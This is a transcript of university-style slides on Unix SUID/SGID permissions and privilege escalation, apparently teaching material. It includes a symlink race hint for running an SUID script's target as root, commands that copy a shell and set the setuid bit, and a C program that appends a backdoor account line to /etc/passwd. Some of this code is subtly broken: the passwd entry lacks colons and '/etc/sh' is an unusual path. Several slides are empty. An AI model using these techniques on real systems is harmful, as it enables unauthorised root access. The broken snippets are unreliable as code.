Unix Permissions contd - PowerPoint PPT Presentation

Slides: 10
Provided by: knig9

Transcript and Presenter's Notes



1
Unix Permissions (contd)
  • More on SUID
  • passwd attacks

2
SUID attacks
  • Recall the following SGID attack
  • What happens with a SUID version in Slack 7?

3
Linux Security
  • Cannot SUID script
  • It seems that SUID for shells is not transitive
    for shell creation
  • i.e. the SUID'd shell has the owner's permissions
    but subsequently created shells have the runner's
    permissions
  • Shells perform a sanity check?

4
Why no SUID for Script?
  • It is hard to write a safe script
  • Race conditions

Linux ignores the setuid bit, because the current method of invoking a script allows for a race condition. This has been solved on other Unix systems (like, say, Solaris) by invoking the interpreter and passing it an open file handle to the script instead of the name of it, breaking the race condition.

From the perlsec man page:

Beyond the obvious problems that stem from giving special privileges to systems as flexible as scripts, on many versions of Unix, set-id scripts are inherently insecure right from the start. The problem is a race condition in the kernel. Between the time the kernel opens the file to see which interpreter to run and when the (now-set-id) interpreter turns around and reopens the file to interpret it, the file in question may have changed, especially if you have symbolic links on your system.

hint: symbolic links and an suid script make it trivial to run any program as the owner of the suid script on such systems, of which Linux is one. Set up a symlink like foo -> /sbin/rootly, where rootly is an suid script. Then run 'foo'... if you're quick and can point foo at myrootshell between the time the kernel decides to run perl (or sh or any other #!'ist script), myrootshell will run as root... even though it's not suid.
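
An added example, not part of the original slides: a small C program showing why passing the interpreter an open file handle instead of the script's name breaks the race. It uses harmless constructed files under /tmp; the function names and file names are assumptions made for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create an empty file; return its inode number, or 0 on failure. */
static ino_t make_file(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return 0;
    if (fstat(fd, &st) < 0) st.st_ino = 0;
    close(fd);
    return st.st_ino;
}

/* Returns 1 when, after the link is re-pointed, the descriptor still refers to
 * the file first opened while the name resolves elsewhere; 0 if not; -1 on error. */
int fd_survives_link_swap(void)
{
    char dir[] = "/tmp/setid-race-XXXXXX";       /* constructed scratch directory */
    char checked[64], other[64], foo[64];
    struct stat by_fd, by_name;
    int result = -1;

    if (!mkdtemp(dir)) return -1;
    snprintf(checked, sizeof checked, "%s/checked", dir);
    snprintf(other, sizeof other, "%s/other", dir);
    snprintf(foo, sizeof foo, "%s/foo", dir);
    ino_t ino_checked = make_file(checked), ino_other = make_file(other);

    if (ino_checked && ino_other && symlink(checked, foo) == 0) {
        int fd = open(foo, O_RDONLY);            /* first open: foo -> checked */
        if (fd >= 0) {
            unlink(foo);                         /* the window: foo is re-pointed */
            if (symlink(other, foo) == 0 && fstat(fd, &by_fd) == 0 && stat(foo, &by_name) == 0)
                result = by_fd.st_ino == ino_checked && by_name.st_ino == ino_other;
            close(fd);
        }
    }
    unlink(foo); unlink(checked); unlink(other); rmdir(dir);
    return result;
}

int main(void)
{
    printf("descriptor unaffected by link swap: %d\n", fd_survives_link_swap());
    return 0;
}
```

An interpreter that reads from the descriptor (for example via /dev/fd/N) sees the file that was checked; one that reopens the name sees whatever the link points to at that moment.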
5
system() command
  • This does not work?
  • This does

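    #include <stdlib.h>

    /* system() hands the command to /bin/sh -c */
    int main(void)
    {
        system("cat alicefile");
        return 0;
    }

    #include <stdio.h>

    /* reads the file directly, no shell involved */
    int main(void)
    {
        FILE *fileptr;
        int c;

        fileptr = fopen("alicefile", "r");
        if (fileptr == NULL)
            return 1;
        while ((c = fgetc(fileptr)) != EOF)
            putchar(c);
        return 0;
    }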
6
Shell Security?
  • SUID on the last program works
  • This does not
  • bob does not get a shell with alice's permission

    cp /etc/sh /home/alice/shell
    chmod 4711 /home/alice/shell
    su bob /home/alice/shell
7
Abuse Exploit
8
Abuse Results
9
Password Exploit Instead
  • Try this

    #include <stdio.h>

    int main(void)
    {
        FILE *fileptr;

        /* append a line to the password file */
        fileptr = fopen("/etc/passwd", "a");
        fprintf(fileptr, "eve00,,,/root/bin/bash\n");
        fclose(fileptr);
        return 0;
    }